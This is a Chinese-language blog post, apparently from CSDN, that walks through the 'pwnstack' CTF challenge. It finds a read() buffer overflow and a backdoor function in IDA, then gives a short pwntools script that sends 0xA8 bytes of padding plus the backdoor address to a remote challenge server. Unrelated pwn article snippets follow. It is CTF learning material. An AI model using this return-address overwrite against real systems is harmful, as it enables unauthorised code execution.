pwn002

已于 2024-09-17 23:32:53 修改
阅读量340 收藏 5
点赞数 12
文章标签: 安全 linux
于 2024-09-17 23:17:23 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Bulestardemon/article/details/142320627
版权

pwnstack

  • 下载附件,拖到kali里面,终端查看信息

  • 4da0363457454ddca4d814723a85a9ec.png

  • 64位系统,没有栈保护

  • 将 pwn2 文件拖到 IDA64 进行分析

  • 点 main 函数,f5反汇编,继续点击 vuln 函数查看

  • 00de2b652a464988bf5d1062b2ac13d8.png

  • 看到 read(),可用于填充数据使其栈溢出(填充数据大于本身)

  • 其地址为 0xA0

  • 接着查看 backdoor 函数,当然会有后门

  • cf9c0dac9095441184a9a1942209adbc.png

  • 查看该函数地址,即为我们要覆盖的地址 0x400762

  • 00d05f750b484f708f4e3f4a5832fd01.png

  • 构造payload 其中要加上 0x08 (64系统的头部位置)

  • from pwn import *
target = remote("61.147.171.105",64910)                 //建立连接
payload = b'a'*(0xA0) +b'a'*(0x08)+ p64(0x400762)       
target.sendline(payload)                              //发送数据
target.interactive()
  • 4f95458d0df14b8ea32a33e4cd64e890.png

  • 至此已成艺术

声明:本人 newbie ,很多原理有待学习,比如汇编语言,函数调用,栈溢出原理等等。

浅浅记录一下。

 

Bulestar_xx
关注
PWN学习002
05-08 160
接上文:http://www.cnblogs.com/ONDragon/p/6821289.html 找到第二个,直接开始,第一篇说清楚了前奏。 首先ssh连接到对方服务器。 尝试执行./col这个程序,查看结果。 查看源码col.c。 #include <stdio.h> #include <string....
CTF_零基础入门PWN_002_20210417
vurtual的博客
04-17 160
①CANNARY(栈保护) 这个选项表示栈保护功能有没有开启。 栈溢出保护是一种缓冲区溢出攻击缓解手段,当函数存在缓冲区溢出攻击漏洞时,攻击者可以覆盖栈上的返回地址来让shellcode能够得到执行。当启用栈保护后,函数开始执行的时候会先往栈里插入cookie信息,当函数真正返回的时候会验证cookie信息是否合法,如果不合法就停止程序运行。攻击者在覆盖返回地址的时候往往也会将cookie信息给覆盖掉,导致栈保护检查失败而阻止shellcode的执行。在Linux中我们将cookie信息称为canary。
Pwn 学习 question_5 x64ROP编程
MrTreebook的博客
04-30 555
Pwn 学习 question_5 x64ROP编程1.源代码2.编译x86x643.x863.1.确定溢出量3.2.布栈3.2.1.第一次溢出3.2.2.计算libc_base3.2.3.第二次溢出3.3.exp4.x644.1.确定溢出量4.2.布栈4.2.1.第一次布栈4.2.2.计算偏移4.2.3.第二次布栈4.3.exp 1.源代码 #include<stdio.h> #include<stdlib.h> #include<unistd.h> int dofun
【愚公系列】2022年01月 攻防世界-简单题-PWN-002(level2)
热门推荐
时光隧道
01-18 3万+
文章目录一、level2二、答题步骤1.获取在线场景2.查壳3.IDA总结 一、level2 题目链接:https://adworld.xctf.org.cn/task/task_list?type=pwn&number=2&grade=0 二、答题步骤 1.获取在线场景 2.查壳 对下载文件进行查壳,命令如下 file level2 checksec --file=level2 分析文件,小端程序(LSB),栈不可执行。 3.IDA 使用IDA对文件进行反汇编 第一步:首先找到ma
python 堆栈溢出_PWN简单堆栈溢出漏洞利用(一) | kTWO-个人博客
weixin_39652646的博客
12-06 492
摘要本文将详细讲述PWN二进制漏洞中简单的堆栈利用,本文将从原理开始讲述,然后层层深入,让读者从理解到动手操作,能够跟着教程完成所有操作。0x01 环境和程序准备安装有pwntools的kali Linux,安装教程可参考上一篇文章。gdb-peda工具,这个是gdb的插件这个可以百度一下安装和使用教程。IDA反汇编工具,可自行百度下载和学习使用方法,本文只做简单介绍。一个Linxu X86的含有...
Chrome v8 pwn
sky123博客
04-17 3309
它是⼀个多进程+IPC的程序, 不同的进程管理不同的内容,
windows pwn 基础知识
sky123博客
06-21 4949
在 Win10 和 Win Server2016 版本之前,只有一种堆类型 NT Heap在 Win10 和 Win Server2016 之后,引入了 Segment Heap(段堆)在之后版本中,除了 UWP 程序之外 一般都继续使用 NT Heap 进行堆管UWP(Universal Windows Platform)是 Win10 引入的一种新的应用程序开发模型,他们采用了一套共享的 API。所以采用 UWP开发的程序,可以在所有 Win10 设备上运行。
pwn学习day1——ELF文件结构
qq_44657899的博客
06-26 1152
ELF 文件的结构可以根据不同的操作系统和体系结构而有所差异。
【PWN · ret2libc】[SWPUCTF 2021 新生赛]whitegive_pwn
Mr_Fmnwon的博客
05-31 705
和【PWN · ret2libc】[2021 鹤城杯]babyof_Mr_Fmnwon的博客-CSDN博客一样,是一道非常典型(指攻破过程)的ret2libc题目。通过泄露got表、libc偏移等,构造system('/bin/sh')由于exp的思路在上面那篇博客讲的很清楚了,这里就不过多赘述,直接上exp。这一次对于ret有点理解了:gets/puts都放在return后,除了函数本身的调用返回外,还有调用函数处被返回(此时caller作为callee)所以可以填写返回地址,控制执行流。
❤️超详细PWN新手入门教程❤️《二进制各种漏洞原理实战分析总结》
Test网络安全
09-15 1万+
本部分将对常见的二进制漏洞做系统分析,方便在漏洞挖掘过程中定位识别是什么类型漏洞,工欲善其事,必先利其器。 0x01栈溢出漏洞原理 栈溢出漏洞属于缓冲区漏洞的一种,实例如下: #include <stdio.h> #include <string.h> int main() { char *str = "AAAAAAAAAAAAAAAAAAAAAAAA"; vulnfun(str); return; } int vulnfun(char *st
【PWN学习】GOT & PLT表
Morphy_Amo的博客
12-09 1412
GOT表和PLT表是什么?是怎样工作的?
get-shell [XCTF-PWN]CTF writeup系列1
重新启程
12-19 1937
因为做vulhub靶场Serial2,在最后一步用到了rop技术,所以就顺便把自己学习pwn的过程做下记录。 今天做的ctf题目是pwn新手训练场的第一题get-shell。 首先我们点击获取在线场景 然后我们就可以看到,这个题目给我们提供了一个服务器端口,我们可以通过telnet连接这个端口 我们可以看到 这个端口是可以直接连接的,这道题目,因为没有回显文件,所以就看不到什么...
跟着CTF-Wiki学pwn|格式化字符串(1)
Kni9hT's Blog
05-19 2242
文章目录格式化字符串漏洞原理介绍格式化字符串函数介绍格式化字符串函数格式化字符串参数格式化字符串漏洞原理格式化字符串漏洞利用程序崩溃泄露内存泄露栈内存获取栈变量数值获取栈变量对应字符串泄露任意地址内存覆盖内存覆盖栈内存确定覆盖地址确定相对偏移进行覆盖覆盖任意地址内存覆盖小数字覆盖大数字 格式化字符串漏洞原理介绍 首先,对格式化字符串漏洞的原理进行简单介绍。 格式化字符串函数介绍 格式化字符串函数可以接受可变数量的参数,并将第一个参数作为格式化字符串,根据其来解析之后的参数。通俗来说,格式化字符串函数就是将计
[调试逆向] Linux内核PWN-ret2dir(附赠基础slub算法!)
ysxx188888的博客
03-13 386
利用的主要是这么个思想以及物理内存的情况,本题也是回忆起了很多内核PWN的基础知识点,算是慢慢抓起来了。
CTFHUB技能树之HTTP协议——响应包源代码
最新发布
weixin_73049307的博客
10-13 437
点击“开始”没有抓取到报文,先看看网页源代码是什么情况。居然直接给出flag了,不知道这题的意义何在。是个贪吃蛇小游戏,看不出来有什么特别的地方。
【OCPP】ocpp1.6协议第5.19 Update Firmware章节的介绍及翻译
qq_53871375的博客
10-11 348
在OCPP 1.6协议中,第5.19章节讨论了“Update Firmware”(更新固件)的功能。这一章节主要描述了如何通过充电站管理系统(CSMS)远程更新充电站的固件,以确保充电站能够支持最新的功能和修复已知的漏洞。该章节描述了通过远程操作更新充电站固件的流程。固件更新是维护充电站软件的一个关键部分,可以提高系统的稳定性、增加功能或修复安全问题。
【Redis安全基线】- 在生产环境中需要注意的安全事项
XuanRan的博客
10-11 1022
Redis是一个高性能的键值存储数据库,但在实际使用中,如果没有适当的安全措施,可能会面临严重的安全风险。本文将介绍几种加强Redis安全性的最佳实践,包括防止弱口令、限制危险命令、修改默认端口等。
为什么云服务器加了安全组端口还是无法访问?
YOKEhn的博客
10-11 545
1.1云服务提供商的防火墙设置:有些云服务提供商在安全组之外还设置了额外的防火墙规则,这些规则可能需要单独配置。通过逐一排查以上可能的原因并采取相应的解决措施,可以有效解决云服务器加了安全组端口仍然无法访问的问题。解决方法:检查云服务提供商的控制台,确保所有相关的防火墙规则都已正确配置并放行相应端口。解决方法:重新检查并配置安全组规则,确保入站规则中放行了目标端口。2.安全组配置错误:安全组规则配置可能有误,导致端口未正确开放。解决方法:查找并停止占用端口的进程,或更改目标服务的端口。
浏览器服务端文件下载控制(安全阻止、文件浏览器打开还是下载行为控制)
trayvontang的博客
10-11 1048
随着浏览器的发展,有很多安全方面的限制,对我们的文件下载行为产生了很大的影响。在JavaScript下载文件(简单模式、跨域问题、文件压缩)我们已经介绍了一些下载问题。文件下载安全设置浏览器和服务端如何控制文件是下载还是打开。
二进制利用入门:Pwn挑战解析
"Introduction-to-Pwn.pdf - pwn学习手册" 在网络安全领域,"pwn"是一种专门针对二进制漏洞利用的技术,它涉及到如何利用软件中的安全漏洞来控制或破坏系统。"Introduction to Pwn"这份手册是为那些对中级到高级的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值